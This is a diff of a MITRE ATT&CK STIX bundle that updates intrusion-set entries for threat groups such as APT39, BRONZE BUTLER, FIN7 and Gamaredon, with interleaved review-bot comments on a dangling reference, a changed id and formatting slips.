"id": "intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340",
@@ -186447,6 +214329,12 @@
"x_mitre_version": "1.2"
},
{
+ "created": "2019-02-19T16:01:38.585Z",
+ "modified": "2020-05-29T20:22:10.625Z",
+ "aliases": [
+ "APT39",
+ "Chafer"
+ ],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
@@ -186463,7 +214351,7 @@
},
{
"source_name": "Chafer",
- "description": "Activities associated with APT39 largely align with a group publicly referred to as Chafer.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)"
+ "description": "Activities associated with APT39 largely align with a group publicly referred to as Chafer.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: Dark Reading APT39 JAN 2019)"
},
{
"source_name": "FireEye APT39 Jan 2019",
@@ -186474,18 +214362,17 @@
"description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
"url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
"source_name": "Symantec Chafer Dec 2015"
+ },
+ {
+ "source_name": "Dark Reading APT39 JAN 2019",
+ "url": "https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764",
+ "description": "Higgins, K. (2019, January 30). Iran Ups its Traditional Cyber Espionage Tradecraft. Retrieved May 22, 2020."
}
],
"name": "APT39",
"description": "[APT39](https://attack.mitre.org/groups/G0087) is an Iranian cyber espionage group that has been active since at least 2014. They have targeted the telecommunication and travel industries to collect personal information that aligns with Iran's national priorities. (Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)",
"type": "intrusion-set",
"id": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
- "aliases": [
- "APT39",
- "Chafer"
- ],
- "modified": "2020-03-30T18:51:45.369Z",
- "created": "2019-02-19T16:01:38.585Z",
"x_mitre_version": "2.1"
},
{
@@ -186516,7 +214403,7 @@
"aliases": [
"APT41"
],
- "modified": "2020-03-30T15:29:01.228Z",
+ "modified": "2020-06-24T00:51:25.764Z",
"created": "2019-09-23T13:43:36.945Z",
"x_mitre_version": "1.1"
},
@@ -186525,7 +214412,7 @@
"id": "intrusion-set--a0cb9370-e39b-44d5-9f50-ef78e412b973",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Axiom",
- "description": "[Axiom](https://attack.mitre.org/groups/G0001) is a cyber espionage group suspected to be associated with the Chinese government. It is responsible for the Operation SMN campaign. (Citation: Novetta-Axiom) Though both this group and [Winnti Group](https://attack.mitre.org/groups/G0044) use the malware [Winnti](https://attack.mitre.org/software/S0141), the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015)",
+ "description": "[Axiom](https://attack.mitre.org/groups/G0001) is a cyber espionage group suspected to be associated with the Chinese government. It is responsible for the Operation SMN campaign. (Citation: Novetta-Axiom) Though both this group and [Winnti Group](https://attack.mitre.org/groups/G0044) use the malware [Winnti for Windows](https://attack.mitre.org/software/S0141), the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -186578,14 +214465,6 @@
"x_mitre_version": "1.2"
},
{
- "type": "intrusion-set",
- "id": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "BRONZE BUTLER",
- "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry. (Citation: Trend Micro Daserf Nov 2017) (Citation: Secureworks BRONZE BUTLER Oct 2017)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -186594,25 +214473,30 @@
},
{
"source_name": "BRONZE BUTLER",
- "description": "(Citation: Trend Micro Daserf Nov 2017)"
+ "description": "(Citation: Trend Micro Daserf Nov 2017)(Citation: Trend Micro Tick November 2019)"
},
{
"source_name": "REDBALDKNIGHT",
- "description": "(Citation: Trend Micro Daserf Nov 2017)"
+ "description": "(Citation: Trend Micro Daserf Nov 2017)(Citation: Trend Micro Tick November 2019)"
},
{
"source_name": "Tick",
- "description": "(Citation: Trend Micro Daserf Nov 2017) (Citation: Symantec Tick Apr 2016)"
+ "description": "(Citation: Trend Micro Daserf Nov 2017)(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)"
},
{
- "source_name": "Trend Micro Daserf Nov 2017",
+ "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/",
"description": "Chen, J. and Hsieh, M. (2017, November 7). REDBALDKNIGHT/BRONZE BUTLER\u2019s Daserf Backdoor Now Using Steganography. Retrieved December 27, 2017.",
- "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/"
+ "source_name": "Trend Micro Daserf Nov 2017"
},
{
- "source_name": "Secureworks BRONZE BUTLER Oct 2017",
+ "url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
"description": "Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.",
- "url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+ "source_name": "Secureworks BRONZE BUTLER Oct 2017"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
},
{
"source_name": "Symantec Tick Apr 2016",
@@ -186620,13 +214504,24 @@
"url": "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan"
}
],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)",
+ "name": "BRONZE BUTLER",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "type": "intrusion-set",
"aliases": [
"BRONZE BUTLER",
"REDBALDKNIGHT",
"Tick"
],
- "modified": "2020-03-30T18:41:41.005Z",
+ "modified": "2020-06-25T20:54:52.793Z",
"created": "2018-01-16T16:13:52.465Z",
+ "x_mitre_contributors": [
+ "Trend Micro Incorporated"
+ ],
"x_mitre_version": "1.1"
},
{
@@ -186678,26 +214573,60 @@
],
"external_references": [
{
- "external_id": "G0097",
+ "external_id": "G0098",
"source_name": "mitre-attack",
- "url": "https://attack.mitre.org/groups/G0097"
+ "url": "https://attack.mitre.org/groups/G0098"
},
{
- "source_name": "Trend Micro Bouncing Golf 2019",
- "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/",
- "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign \u2018Bouncing Golf\u2019 Affects Middle East. Retrieved January 27, 2020."
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
}
],
- "description": "[Bouncing Golf](https://attack.mitre.org/groups/G0097) is a cyberespionage campaign targeting Middle Eastern countries.(Citation: Trend Micro Bouncing Golf 2019)",
- "name": "Bouncing Golf",
+ "description": "[BlackTech](https://attack.mitre.org/groups/G0098) is a cyber espionage group operating against targets in East Asia, particularly Taiwan, and occasionally, Japan and Hong Kong.(Citation: TrendMicro BlackTech June 2017)",
+ "name": "BlackTech",
"type": "intrusion-set",
- "id": "intrusion-set--049cef3b-22d5-4be6-b50c-9839c7a34fdd",
+ "id": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
"aliases": [
- "Bouncing Golf"
+ "BlackTech"
],
- "modified": "2020-03-26T20:58:44.722Z",
- "created": "2020-01-27T16:55:39.688Z",
- "x_mitre_version": "1.0"
+ "modified": "2020-05-06T18:12:23.832Z",
+ "created": "2020-05-05T18:36:45.970Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Tatsuya Daitoku, Cyber Defense Institute, Inc."
+ ]
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "G0108",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0108"
+ },
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) is a cluster of observed activity involving Monero cryptocurrency-mining payloads in dynamic-link library (DLL) form on Windows systems. The earliest observed Blue Mockingbird tools were created in December 2019.(Citation: RedCanary Mockingbird May 2020)",
+ "name": "Blue Mockingbird",
+ "type": "intrusion-set",
+ "id": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "aliases": [
+ "Blue Mockingbird"
+ ],
+ "modified": "2020-06-25T13:59:09.596Z",
+ "created": "2020-05-26T20:09:39.139Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Tony Lambert, Red Canary"
+ ]
},
{
"type": "intrusion-set",
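Review bot: The removed lines in this hunk delete the Bouncing Golf intrusion-set object (`G0097`, `intrusion-set--049cef3b-22d5-4be6-b50c-9839c7a34fdd`) rather than editing it — the added lines at the same position are a different object (BlackTech, `G0098`, `intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8`), so the diff reads as a rename but is a removal plus an insertion. Any `relationship` object elsewhere in the bundle whose `source_ref` or `target_ref` is the old id now dangles unless those relationships were removed in a hunk outside this view; the object may have been moved to another bundle, but nothing here shows that. Consumers resolving refs by id should be checked, or the old object kept with `"revoked": true` as STIX expects for retired objects.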
@@ -186754,41 +214683,41 @@
],
"modified": "2020-03-28T00:22:39.895Z",
"created": "2017-05-31T21:31:49.021Z",
- "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Anastasios Pingios"
- ]
+ ],
+ "x_mitre_version": "1.1"
},
{
- "type": "intrusion-set",
- "id": "intrusion-set--7636484c-adc5-45d4-9bfe-c3e062fbc4a0",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Charming Kitten",
- "description": "[Charming Kitten](https://attack.mitre.org/groups/G0058) is an Iranian cyber espionage group that has been active since approximately 2014. They appear to focus on targeting individuals of interest to Iran who work in academic research, human rights, and media, with most victims having been located in Iran, the US, Israel, and the UK. [Charming Kitten](https://attack.mitre.org/groups/G0058) usually tries to access private email and Facebook accounts, and sometimes establishes a foothold on victim computers as a secondary objective. The group's TTPs overlap extensively with another group, [Magic Hound](https://attack.mitre.org/groups/G0059), resulting in reporting that may not distinguish between the two groups' activities. (Citation: ClearSky Charming Kitten Dec 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
+ "external_id": "G0058",
"source_name": "mitre-attack",
- "url": "https://attack.mitre.org/groups/G0058",
- "external_id": "G0058"
+ "url": "https://attack.mitre.org/groups/G0058"
},
{
"source_name": "Charming Kitten",
"description": "(Citation: ClearSky Charming Kitten Dec 2017)"
},
{
- "url": "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf",
+ "source_name": "ClearSky Charming Kitten Dec 2017",
"description": "ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.",
- "source_name": "ClearSky Charming Kitten Dec 2017"
+ "url": "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf"
}
],
+ "description": "[Charming Kitten](https://attack.mitre.org/groups/G0058) is an Iranian cyber espionage group that has been active since approximately 2014. They appear to focus on targeting individuals of interest to Iran who work in academic research, human rights, and media, with most victims having been located in Iran, the US, Israel, and the UK. [[Charming Kitten](https://attack.mitre.org/groups/G0058) often tries to access private email and Facebook accounts, and sometimes establishes a foothold on victim computers as a secondary objective. The group's TTPs overlap extensively with another group, [Magic Hound](https://attack.mitre.org/groups/G0059), resulting in reporting that may not distinguish between the two groups' activities.(Citation: ClearSky Charming Kitten Dec 2017)",
+ "name": "Charming Kitten",
+ "type": "intrusion-set",
+ "id": "intrusion-set--92d5b3fd-3b39-438e-af68-770e447beada",
"aliases": [
"Charming Kitten"
],
- "modified": "2019-03-22T19:59:49.319Z",
- "created": "2018-01-16T16:13:52.465Z",
+ "modified": "2020-07-04T23:15:31.278Z",
+ "created": "2018-01-16T00:14:20.562Z",
"x_mitre_version": "1.0"
},
{
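Review bot: The new `description` value on the added line has a stray opening bracket, `[[Charming Kitten](https://attack.mitre.org/groups/G0058) often tries`, which renders as a literal `[` before the link; it should read `[Charming Kitten](https://attack.mitre.org/groups/G0058) often tries`. Separately, this hunk changes the object's `id` from `intrusion-set--7636484c-adc5-45d4-9bfe-c3e062fbc4a0` to `intrusion-set--92d5b3fd-3b39-438e-af68-770e447beada` and its `created` timestamp, both of which STIX treats as immutable for a given object — this is effectively a new object replacing the old one. Every `relationship` that references the old id must be updated or removed in the same change, and the old object should remain as revoked if consumers may still hold references; whether that happened is outside this hunk.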
@@ -186866,9 +214795,9 @@
"description": "(Citation: Crowdstrike Global Threat Report Feb 2018)"
},
{
- "url": "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html",
+ "source_name": "Talos Cobalt Group July 2018",
"description": "Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.",
- "source_name": "Talos Cobalt Group July 2018"
+ "url": "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html"
},
{
"source_name": "PTSecurity Cobalt Group Aug 2017",
@@ -186921,7 +214850,7 @@
"Cobalt Gang",
"Cobalt Spider"
],
- "modified": "2020-03-28T21:25:27.125Z",
+ "modified": "2020-06-23T19:41:51.510Z",
"created": "2018-10-17T00:14:20.652Z",
"x_mitre_version": "1.2"
},
@@ -186987,15 +214916,15 @@
"description": "(Citation: Lookout Dark Caracal Jan 2018)"
},
{
- "source_name": "Lookout Dark Caracal Jan 2018",
+ "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf",
"description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.",
- "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf"
+ "source_name": "Lookout Dark Caracal Jan 2018"
}
],
"aliases": [
"Dark Caracal"
],
- "modified": "2020-03-30T18:54:29.365Z",
+ "modified": "2020-06-03T20:22:40.401Z",
"created": "2018-10-17T00:14:20.652Z",
"x_mitre_version": "1.2"
},
@@ -187032,10 +214961,45 @@
"aliases": [
"DarkHydrus"
],
- "modified": "2020-03-30T18:55:32.024Z",
+ "modified": "2020-05-15T15:44:47.629Z",
"created": "2018-10-17T00:14:20.652Z",
+ "x_mitre_contributors": [
+ "Oleg Skulkin, Group-IB"
+ ],
"x_mitre_version": "1.2"
},
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "G0105",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0105"
+ },
+ {
+ "source_name": "DarkVishnya",
+ "description": "(Citation: Securelist DarkVishnya Dec 2018)"
+ },
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
+ "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) is a financially motivated threat actor targeting financial institutions in Eastern Europe. In 2017-2018 the group attacked at least 8 banks in this region.(Citation: Securelist DarkVishnya Dec 2018)",
+ "name": "DarkVishnya",
+ "type": "intrusion-set",
+ "id": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029",
+ "aliases": [
+ "DarkVishnya"
+ ],
+ "modified": "2020-05-15T15:08:55.062Z",
+ "created": "2020-05-15T13:07:26.651Z",
+ "x_mitre_version": "1.0"
+ },
{
"type": "intrusion-set",
"id": "intrusion-set--9e729a7e-0dd6-4097-95bf-db8d64911383",
@@ -187110,7 +215074,7 @@
"url": "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/"
},
{
- "url": "https://www.emc.com/collateral/white-papers/h12756-wp-shell-crew.pdf",
+ "url": "https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf",
"description": "RSA Incident Response. (2014, January). RSA Incident Response Emerging Threat Profile: Shell Crew. Retrieved January 14, 2016.",
"source_name": "RSA Shell Crew"
},
@@ -187141,12 +215105,12 @@
"PinkPanther",
"Black Vine"
],
- "modified": "2020-03-30T18:57:39.836Z",
+ "modified": "2020-04-17T21:11:30.305Z",
"created": "2017-05-31T21:31:49.412Z",
+ "x_mitre_version": "1.2",
"x_mitre_contributors": [
"Andrew Smith, @jakx_"
- ],
- "x_mitre_version": "1.2"
+ ]
},
{
"type": "intrusion-set",
@@ -187366,10 +215330,10 @@
],
"modified": "2020-03-30T18:58:36.955Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Valerii Marchuk, Cybersecurity Help s.r.o."
- ]
+ ],
+ "x_mitre_version": "1.1"
},
{
"type": "intrusion-set",
@@ -187399,7 +215363,7 @@
"aliases": [
"Equation"
],
- "modified": "2020-03-30T18:59:31.800Z",
+ "modified": "2020-06-29T01:39:22.044Z",
"created": "2017-05-31T21:31:54.697Z",
"x_mitre_version": "1.2"
},
@@ -187473,7 +215437,7 @@
"aliases": [
"FIN4"
],
- "modified": "2020-03-30T19:00:39.460Z",
+ "modified": "2020-06-23T19:52:35.625Z",
"created": "2019-01-31T02:01:45.129Z",
"x_mitre_version": "1.1"
},
@@ -187517,10 +215481,10 @@
],
"modified": "2020-03-19T22:54:59.268Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Walker Johnson"
- ]
+ ],
+ "x_mitre_version": "1.1"
},
{
"type": "intrusion-set",
@@ -187556,23 +215520,31 @@
"source_name": "FireEye FIN6 Apr 2019"
},
{
- "source_name": "Security Intelligence More Eggs Aug 2019",
+ "description": "Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.",
"url": "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/",
- "description": "Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019."
+ "source_name": "Security Intelligence More Eggs Aug 2019"
}
],
"aliases": [
"FIN6",
"ITG08"
],
- "modified": "2020-03-30T02:14:10.455Z",
+ "modified": "2020-05-15T19:15:35.233Z",
"created": "2017-05-31T21:32:06.015Z",
- "x_mitre_version": "2.1",
"x_mitre_contributors": [
"Drew Church, Splunk"
- ]
+ ],
+ "x_mitre_version": "2.1"
},
{
+ "type": "intrusion-set",
+ "id": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "FIN7",
+ "description": "[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has primarily targeted the U.S. retail, restaurant, and hospitality sectors since mid-2015. They often use point-of-sale malware. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security. [FIN7](https://attack.mitre.org/groups/G0046) is sometimes referred to as [Carbanak](https://attack.mitre.org/groups/G0008) Group, but these appear to be two groups using the same [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately. (Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: FireEye CARBANAK June 2017) (Citation: FireEye FIN7 Aug 2018)",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -187584,24 +215556,24 @@
"description": "(Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: Morphisec FIN7 June 2017) (Citation: FireEye FIN7 Shim Databases) (Citation: FireEye FIN7 Aug 2018)"
},
{
- "url": "https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html",
+ "source_name": "FireEye FIN7 March 2017",
"description": "Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.",
- "source_name": "FireEye FIN7 March 2017"
+ "url": "https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html"
},
{
- "source_name": "FireEye FIN7 April 2017",
+ "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html",
"description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.",
- "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
+ "source_name": "FireEye FIN7 April 2017"
},
{
- "url": "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html",
+ "source_name": "FireEye CARBANAK June 2017",
"description": "Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.",
- "source_name": "FireEye CARBANAK June 2017"
+ "url": "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html"
},
{
- "source_name": "FireEye FIN7 Aug 2018",
+ "url": "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html",
"description": "Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.",
- "url": "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+ "source_name": "FireEye FIN7 Aug 2018"
},
{
"source_name": "Morphisec FIN7 June 2017",
@@ -187614,18 +215586,10 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "description": "[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has primarily targeted the U.S. retail, restaurant, and hospitality sectors since mid-2015. They often use point-of-sale malware. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security. [FIN7](https://attack.mitre.org/groups/G0046) is sometimes referred to as [Carbanak](https://attack.mitre.org/groups/G0008) Group, but these appear to be two groups using the same [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately. (Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: FireEye CARBANAK June 2017) (Citation: FireEye FIN7 Aug 2018)",
- "name": "FIN7",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc",
- "type": "intrusion-set",
"aliases": [
"FIN7"
],
- "modified": "2020-03-30T19:36:27.792Z",
+ "modified": "2020-06-24T19:07:46.524Z",
"created": "2017-05-31T21:32:09.460Z",
"x_mitre_version": "1.4"
},
@@ -187666,6 +215630,34 @@
"created": "2018-04-18T17:59:24.739Z",
"x_mitre_version": "1.1"
},
+ {
+ "id": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e",
+ "type": "intrusion-set",
+ "name": "Frankenstein",
+ "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) is a campaign carried out between January and April 2019 by unknown threat actors. The campaign name comes from the actors' ability to piece together several unrelated components.(Citation: Talos Frankenstein June 2019) ",
+ "external_references": [
+ {
+ "external_id": "G0101",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0101"
+ },
+ {
+ "source_name": "Talos Frankenstein June 2019",
+ "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html",
+ "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "aliases": [
+ "Frankenstein"
+ ],
+ "modified": "2020-05-28T00:01:09.384Z",
+ "created": "2020-05-11T15:21:09.438Z",
+ "x_mitre_version": "1.0"
+ },
{
"type": "intrusion-set",
"id": "intrusion-set--0ea72cd5-ca30-46ba-bc04-378f701c658f",
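Review bot: The added Frankenstein object's `description` string ends with a trailing space after `(Citation: Talos Frankenstein June 2019)`, which survives into every consumer that renders or hashes the value; the other objects in this diff end their descriptions at the closing parenthesis. Trimming it, `...(Citation: Talos Frankenstein June 2019)"`, keeps the field consistent with the rest of the bundle.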
@@ -187731,14 +215723,6 @@
"x_mitre_version": "1.1"
},
{
- "type": "intrusion-set",
- "id": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Gamaredon Group",
- "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) is a threat group that has been active since at least 2013 and has targeted individuals likely involved in the Ukrainian government. (Citation: Palo Alto Gamaredon Feb 2017)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -187750,16 +215734,37 @@
"description": "(Citation: Palo Alto Gamaredon Feb 2017)"
},
{
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
- "source_name": "Palo Alto Gamaredon Feb 2017"
+ "source_name": "Palo Alto Gamaredon Feb 2017",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
+ },
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
+ },
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
}
],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) is a threat group that has been active since at least 2013 and has targeted individuals likely involved in the Ukrainian government. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) comes from a misspelling of the word \"Armageddon\", which was detected in the adversary's early campaigns.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)",
+ "name": "Gamaredon Group",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "type": "intrusion-set",
"aliases": [
"Gamaredon Group"
],
- "modified": "2020-03-30T19:05:56.589Z",
+ "modified": "2020-06-25T20:56:02.454Z",
"created": "2017-05-31T21:32:09.849Z",
